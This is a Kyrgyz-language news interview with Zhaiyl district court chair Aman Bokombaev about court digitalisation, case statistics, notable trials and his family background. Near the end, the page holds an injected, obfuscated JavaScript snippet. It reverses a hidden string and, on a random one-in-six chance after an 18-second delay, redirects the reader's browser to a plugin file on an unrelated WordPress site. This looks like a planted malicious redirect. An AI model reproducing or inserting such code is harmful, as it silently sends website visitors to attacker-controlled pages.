Аман Бокомбаев: «Адам тагдырына калыс кароо кадыр-барк алып келет»

18-февраль, 2022-ж. / Редакция / Жаңылыктар 57

Чүй облусунун Жайыл райондук сотунун төрагасы Аман Бокомбаев:

Бокомбаев Аман Мамыркожоевич 2002-жылы Ж.Баласагын атындагы улуттук университетинин юридикалык факультетин аяктаган. “Дарак бир жерден көгөрөт” демекчи,  алгачкы эмгек жолун 2003-жылы мына ушул Жайыл районунда Сот аткаруучулар кызмат бөлүмүндө сот аткаруучу болуп баштаган. 2007-жылы ага сот аткаруучу кызматын өтөгөн. 2015-жылдын ноябрь айынан тартып Чүй облусунун Жайыл райондук сотунда сот болуп дайындалган. Ал эми Жайыл райондук сотунун төрагалык эки тизгин, бир чылбырын алганына 2 жыл толду.

Үй-бүлөлүү, бир кыз, бир уулдун атасы.

 

Аман Мамыркожоевич, кылмышка шектүүлөрдү кыраакылык менен кароо милдети чынында жеңил эмес. Сиздер кабыл алган чечимдер күнөөсүздөрдү сүйүндүрүп, күнөөлүүлөрдү күйүндүрүп турса кана атаганат. Тилекке каршы, соттор туура эмес чечимдерди чыгарды дешип, чычалап жүргөндөр да кездешет. Кара кылды как жарган калыстык менен адам тагдырын чечүү не деген дөөлөт?!

 Айтканыңызда калет жок. Бир жакшы жери кийинки кезде соттордун жоопкерчилигин чыңдоого мамлекеттик деңгээлде маани берилип жатат. Эң башкысы материалдык-техникалык базаларыбыз чыңдалды. Кечээги мезгил менен бүгүнкү күндү салыштырып болбойт. Жашообуздун күрөө тамырына айланган санариптештирүү биринчилерден бизге жетиши жемиштүү эмгектенүүнүн негизи. Калп айткан менен болбос, мурда сот процесстеринин кандай жүргөнүнө кызыккан муктаждардын толук кандуу билүү мүмкүнчүлүгү аз эле. Баштан аяк катчылар кагазга түшүрүүгө аракеттенишчү. Болгонун болгондой жазып чыгуу, сүрөттөө мүмкүндүгү жок эле. Учурда уучубуз узарды. Сот процесси толук видеого тартылып, дискке жазылып, ачык-айкындык менен жүргүзүлөт. Мурдагыдай том-том болгон сот отурумдун бардыгы дискттерде сакталган. Будамайлап, бурмалоо өң тургай түшкө кирбейт. Кагаз жүзүндө сот отурумунун протоколдору, тиркелген иш процесстер акырындап четтетилүүдө. Кол күчү калды, санариптештирүү мээнеттерибизди алда канча жеңилдетти. Сот процесстеринин иши ийне-жибине чейин видеого тартылгандыктан ачык-айкындык өкүм сүрдү. Соттор караган иштеринин адилеттүүлүгү үчүн бүткүл эрудициясын сарпташып, эл үмүтүн актоого бардык аракеттерин жумшап жатышат. Бардык кабинеттер заманбап компьютер, аудиодиск, видеолор менен жабдылган.

Былтыркы жылдын көрсөткүчтөрүнө токтолсок биздин соттор тарабынан жалпы 3 миңден ашык иш каралды. Мындан 3415 иш толук аягына чыкты. 2020-жылга салыштырмалуу былтыр 2021-жылы 736 иш көбүрөөк каралды, же 29,9 пайызга жогорулаган. Ошондой эле бизден жогорку инстанцияларга даттануу боюнча 201 иш кеткен. Мындан ү3 пайызы күчүндө калтырылган. 12си жокко чыгарылган. Бул 12,77%ды түзөт. Даттануулардын 4,21%ы өзгөрүлгөн. Демек, биз калыстык менен караган иштердин басымдуусу туура чечилген,

Караган иштериңиздердин сексен пайыздан ашык чечимдери күчүндө калышы жакшы натыйжа десек жаңылыштык эмес. “Атын атаса — куту сүйүнөт” демекчи сотторуңуздун ишмердиктери тууралуу айтып берсеңиз?

  Биз такшалган, тажрыйбалуу сот айымдарыбыз менен сыймыктансак болот. Мисалы, Джандаралиева Надира Джекшеновна ү72 иш караган. Жогорку сотторго даттануулардын ү5%ы күчүндө калтырылган. Жоопкерчилик, таразадай тактык менен иштегени, жабырлануучулардын жан дүйнөлөрүн терең баамдап билгени, айыпкерлердин кылмыштарын камырдан кыл сууругандай аныктагандыгы алаканга салгандай көрүнүп турат. Өз ишин сүйгөндүгү, кесипкөйлүгү, билимдүүлүгү, ар дайым изденүүнүн үстүндө жүргөндүгү үзүрүн берүүдө.

Усакпаева Гульзат Каныбековна 593 ишти караган. Анын эң башкы жетишкендиги болуп чыгарылган соттук актыларына келтирилген -даттануулардын 100%ы күчүндө калган. Бардык иштери калыстык менен чечилгени бекемделди.

Ушундай эле жакшы пикирлерди соттор Асанова Чолпон Карыпбековнага жана Саадабаева Чынара Муратбековнага айтсак жарашат. Чолпон Карыпбековнанын караган иштеринин 75%ы күчүндө калса, Чынара Муратбековнанын караган иштеринин ү5%ы күчүндө калтырылган. Акыйкат чечимдерди жеринде кабыл алсак, тууралыгын бекемдесек, даттануулар да азаят деген ойдомун. Мындай жогорку жыйынтыктар санариптештирүүнүн түздөн-түз таасири. Тааныш-билиштик, коррупциялык кадамдар жасалбай сот процесстеринде мүмкүнчүлүктүн жетишинче тазалык өкүм сүрүүдө.

Сот айымдарына болгон эл ишенимдери бекемделиптир. Алкыштарга бай, каргыштардан алыс болушсун. Айрыкча оор кылмыш кылтагына илингендердин тагдырын чечүү, акыркы чекитти коюу оор. Башыңыздан кечирген эсте каларлык окуялардан айтып берсеңиз?

 Эсимдеги бир иш жөнүндө айтып берейин. Бир жолу бир кемпир алыскы райондордон борбор шаарыбызга такси менен жолго чыгат. Ал аңгыча бирөө келип: “Сизди тосуп алат, ага бул түйүнчөктү берип коюңуз” дейт. Кемпир макул болот. Тилекке каршы, шаарга келгенде 600 грамм наркотикалык зат менен кармалып калат. Кемпир кимден алганын айтпаска касам ичкендей тааныбастыгын тана баштайт. Тергөөчүлөр наркотикалык затты ким аркылуу алганын тактап чыгууга абдан аракеттеништи. Ток этери, кемпирди соттоого туура келди. Чечимди угузуп жатканда байкуш кемпирди аяп турдум. Бирок, мыйзам улук. Кыскасы, узак мөөнөт 9 жылга эркинен ажыратылды. Жетимиш жашка таяп калган кемпирдин абактагы жашоосун башкалардын башына салбасын! Ошол кемпирди сурап, кантип сот жообуна тартканым кээде эсиме келе калат. Абдан оор күн болгон. Чечимди окуп жатканымда колдорум калтырап турган. Жан дүйнөм жабыркап чыккан.

Дагы бир эсимдеги иш, жол кырсыгынан жабыр тарткандардын ишин карап жаткам. Жол кырсыгынан күлгүндөй айдоочу жигит көз жумган. Ата-эне, агайын туугандары, жакындары уруп кеткен айдоочуну эки чайнап, бир жутуудан кайра тартпай турган. Иштин жөнүн талдап келгенде айыптуу атайлап жол кырсыгын жасабаган. Кокустук кырсыкка алып келген. Ток этери, айыбын угуздум. Күнөөлүү жигит 4 жылга эркинен ажыратылды. Кудай бетин салбасын туугандары: “Түрмөдө чирип өлчү күнөөкөрдү колдодуң. 4 жыл эмне эми эле өтүп кетет. Ал эми өлгөн балабыз кайра кайдан тирилет?” дешип мени каргап-шилеп жатышты. Ишенсеңиз адам болуп туулгандан андай суук каргыштарды уккан эмесмин. Уккан кулагыма бир ишенип, бир ишенбей катуу санаага баттым. Түнү бою кулагыма тигилердин каргыштары жаңырып, кайсы жеримен жаңылдым, жаздым деп жаттым. Таң эрте ишке келсем баягы мени каргагандар мени тосуп чыгышты. Чындык керек: «Дагы эмне балээ болуп кетти, каргыштары аз келгенсип, эмне кол көтөрүшөбү?» – деп чоочулап турат элем. Тигилер жаныма келип: “Биз жарашып алдык”,- дешсе болобу. Ушундайлар да болот.

Биздин Жайыл районунда төбө чачты тик тургузган кыз ала качуу оор кылмышы болгонун кимдер билбейт? Кыздын бычакталган трагедиялуу өлүмү не деген талаш-тартыштарды пайда кылды. Андан көп узабай борбор шаарыбыздан Айзада аттуу кызды ала качып, аны да алам деген зөөкүр жигити кыйнап өлтүрүп салды. Ошентип “Кыз ала качуу” кылмыштардын ичинен өтө популярдуулугу менен ооздон-оозго көчүп, бүйүр кызыткан талаш-тартыштарды жаратты. Зөөкүр жигиттерге чынында убал жок. Бирок, кыз менен жигиттердин чала кайым баш кошуулары да болбос жерден чуу чыгарууда.

Биздин Кош-Дөбө айылында да “Кыз ала качуу” жалаасы менен күйөө бала жана эки күйөө жолдошу кармалып, уюшкан кылмыш жоруктары менен айыпталып, акыры иштери сотко өттү. Бул ишти да баштан аяк мен карадым. Көрсө, иш мындай болуптур. Жигит менен кыз сүйлөшүп жүрүшкөн. Ал ортодо араздашып аралары алыстап калат. Бир күнү жигит кызга аялдамадан жолугуп калат. Кыскасы кыз менен жарашып, үйүнө алып келет. үйүндө энеси эле жалгыз болгон. Иштин жайын угуп, келинине чуркайт. Абысыны келет. Башына жоолук салышат. Айылдаш эки жигит кирип келип, жаңы үйлөнүп жаткандарды куттуктап калат. Келин алгандар: “Кызыңызды биз келин кылып алдык, өз эрки менен келди. Уулубуз менен сүйлөшүп жүрүптүр” дешип кыздын энесине телефон чалышат. Кыздын энеси кыздын атасына айтат. Атасы атчан мас болуп келип: “Эмне үчүн мага айтпай кызымды алып келдиңер!” деп чатак чыгара баштайт. Ошол мезгилден пайдаланган кыз качып кетет.

Ошентип, өз эле каалоосу менен келген кызды “Ала качып кетишиптир!” деп атасы сотко берет. Баягы эки жолдош балдары да айыптуу болуп калат. “үчөөлөп кыз уурдап качышкан” деген калпыс тыянак менен сот жообуна тартылмай болушуп калышат. Тиги “күйөө жолдош” эки жигит тең Тажикстандан качып келишкен этникалык кыргыздардын уулдары экен. Биринин кулагы жакшы укпайт. Беркиси да майып. Тажикстанда болгон жарандык согушта жан соогалап качып келгендерди кыз ала качуу беренеси менен соттосом, күйөө бала менен бирге экөөнө тең 7 жылдан бермекмин. Топтолуп, уюшуп кылмыш кылуу беренеси оор болот.

Ооба, кыз ала качуу кылмыш. Бирок, бул жерде эч кандай кыз ала качуу, зордуктап мажбурлоо болгон эмес. Кыз берген суроолорума жооп берди. Ырас эле ал өз ыктыяры менен келген. Болгону чатак салган, атчан мас атасынан коркуп, качып чыгып кеткен.

“Кеминде 7 жылдан эркинен ажыратылат” деген уулдарынын акталышы ата-энелер, туугандары үчүн чоң кубаныч болгон. Наркотик менен кармалган кемпир эсимен кетпей кыйналган түндөй эмес, же жол кырсыгынан мерт болгон жигиттин туугандары каргап-шилеген күндөй эмес, ошол ала качуу жалаасы жабылган 3 жигитти актаган күнү тынч уктадым. Балдардын тагдырына балта чабылбады.

Эми мындай окуяларды айта берсек, аз эмес.

Аман Мамыркожоевич, Жогорку бийликтин бир бутагы соттордун эркиндиги тууралуу 30 жылдан бери айтылып келди. Бирок, иш жүзүнө ашпай келген. Бир жакшы жери Президентибиз Садыр Жапаров бүгүнкү соттордун эркиндигине кепилдик берди. Иштериңиздердин илгерилеп жатканы да ушундай жагымдуу жагдайлардан улам болуп жатат десек болобу?

  Албетте, болот. Былтыр 5-март соттордун күнүндө Президент Садыр Жапаров менен жолукканыбызда биз жөнүндө жакшы сөздөр болду. Мисалы, мурда Президент менен түз байланышуу мүмкүн эмес эле. Ал эми учурда кандайдыр бир зарылдык болсо түзмө-түз байланышууга жол ачылган. Мына ушул кепилдик тууралуу атайын топ түзүлдү. Ак үй, көк үйлөрдөн көрсөтмө берүү, кысымга алуу деген алыстады. Сот акыйкаттыгы салтанаттай баштады.

Сиз кыргыз элине аттын кашкасындай белгилүү “Ленин”, “Эмгек Кызыл Туу”, “Октябрь революциясы”, Даңк” ордендеринин кавалери, Кыргыз ССР Жогорку Советинин 3 жолку ( 9-10-11) чакырылышынын депутаты, КР спорт чебери, КР эмгек сиңирген машыктыруучусу Бокомбаев Мамыркожонун уулу болосуз. Замандаштары: “Союз тарабай турганда “Социалисттик Эмгектин Баатыры” наамын алмак деп келишет. Атаңыздын кандай асыл сапаттарын алып калдыңыз?

  Тарбия башаты үй-бүлө деп бекеринен айтышпайт. Атабыз менен апабыз жаш чактарынан чабандык татаал кесипти аркалашкан. Биз да бала күндөн эмгекке бышып өстүк. Атам убагында сый-урматтын үстүндө жүрдү. Ал эми союз тараганда эркиндик колубузга тийди. Атабыз көөнө көчмөн кыргыз элинин унутула баштаган көк бөрү оюнун кайрадан жандандырууда көп салымын кошту. “Рассвет” көк бөрү командасы тууралуу жалпы кыргыз эли тургай, коңшу Казакстан, Өзбекстан жана башка өлкөлөр жакшы билет. Мен да ага, инилерим менен биргеликте тандалма көк бөрү командасында ойноп калдым. 1999-жылы Өзбекстанда, 2000-жылы Казакстанда чемпион болгон. 2 жолку көчмөндөр оюндарында биздин көк бөрүчүлөр тандалма команда менен катышып, жеңиш туусун желбиретишкен. Атабыздан көп асыл сапаттарды алдык. Ал чынчылдык, таман акы маңдай тер менен кызмат кылуу. Баарынан да ат жалында ойногон спортко жакын өстүк. Азыр “Рассвет” көк бөрү командасынын ардагеримин. Көк бөрү боюнча КР спорт чеберимин.

Биздин кесибибиз өтө оор жана жоопкерчиликтүү. Күндөн күнгө сотко түшкөн арыздардын саны өсүүдө. Соттордун иши тынымсыз, анткени иштер көп, ар бир иштин кароо мөөнөтү бар. Ошондуктан сотто иш күндөрүнөн тышкары сотторубуз жана аппарат кызматкерлерибиз дем алыш күндөрү да иштеп келишүүдө. Аппарат кызматкерлерибиз айлык маянасы аз болгонуна карабай ушундай жагдайларда иштеп келишет. Бирде жогоруда мен мисал келтиргендей каргыш алсак, бирде алкыш алабыз. Албетте иш да керек. Ошол эле мезгилде эс алууну да билишибиз кажет. Иш менен бирге эс алууну, маданий-спорттук иш-чараларды айкалыштырууга айрыкча көңүл буруудабыз. Коллегаларым да ар дайым колдоп келет. Чүй облусу боюнча футбол курама командасынын мүчөсүмүн. Райондук мекеме-ишканалар ортосунда өткөрүлгөн бардык маданий жана спорттук иш-чараларга шарт жагдайга жараша катышабыз. Ынтымак-ырашкерликти бекемдеп, элдин ишеничине толууга бардык аракеттерди жумшап келебиз.

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/18_02-1.pdf»>2022-ЖЫЛДЫН 18-ФЕВРАЛЫ

Айчүрөк Макешова

 

18-февраль, 2022-ж. / Редакция / Жаңылыктар 57
Бөлүшүү: Telegram WhatsApp X